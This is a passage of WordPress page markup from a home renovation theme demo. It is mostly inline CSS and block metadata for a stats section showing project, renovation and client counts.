undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6b0e2ffd-e3fd-4707-bd8d-df424a1d4029 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"bb519bbf-75d4-4620-a3da-12a30296f3eb\"} -->\n<style type=\"text/css\"> .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-bb519bbf-75d4-4620-a3da-12a30296f3eb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-bb519bbf-75d4-4620-a3da-12a30296f3eb\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-008f2a71-c9df-4a0e-96a7-98bfc8e4fa6a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topMargin\":2,\"bottomPaddingMobile\":40,\"blockId\":\"876ad3dc-62d4-4656-a484-5cb2941ef978\"} -->\n<style type=\"text/css\"> .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 2px; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-876ad3dc-62d4-4656-a484-5cb2941ef978 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-876ad3dc-62d4-4656-a484-5cb2941ef978\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"fcd25d96-31cf-4465-9efa-36881a5ba21e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"2a47d1fd-92e1-4c68-b763-70488f27ad66\"} -->\n<style type=\"text/css\"> .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a47d1fd-92e1-4c68-b763-70488f27ad66\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"6aed668a-fb10-4525-96ac-4bc41b761fd7\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\"} -->\n<style type=\"text/css\"> .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 